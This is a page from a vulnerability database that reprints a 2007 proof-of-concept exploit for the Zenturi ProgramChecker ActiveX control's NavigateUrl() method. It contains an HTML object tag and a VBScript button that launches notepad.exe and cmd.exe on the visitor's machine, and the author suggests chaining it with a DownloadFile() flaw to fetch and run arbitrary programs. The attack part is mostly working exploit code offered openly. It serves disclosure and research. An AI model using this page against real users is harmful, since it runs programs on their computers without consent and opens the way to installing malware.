Lucene search
K

Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit

🗓️ 09 Jun 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 13 Views

Zenturi ProgramChecker ActiveX NavigateUrl Insecure Method Exploi

Code

                                                <pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 <b>Zenturi ProgramChecker ActiveX Control "NavigateUrl()" Insecure Method</b>
 
 url: http://www.programchecker.com/activeintro.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

 I can't believe my eyes when I see what you can do with this ActiveX
 (and I can't believe that this product is considered as antispyware).
 You can use the "NavigateUrl()" to arbitrary launch local file from a pc.
 Try, for example, to launch "c:\somefile.exe" and see what happen.
 Imagine to use this method with the "DownloadFile()" one, you can download
 something on the pc and run it without problems.
 For the "DownloadFile()" vulnerability see:
 <a href=http://www.milw0rm.com/exploits/4008>http://www.milw0rm.com/exploits/4008</a>
-----------------------------------------------------------------------------

<object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='test' ></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe()
 
 test.NavigateUrl "notepad.exe" ,"shinnai" ,"_SELF"
 test.NavigateUrl "cmd.exe" ,"shinnai" ,"_SELF"

End Sub
</script>
</span></span>
</code></pre>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation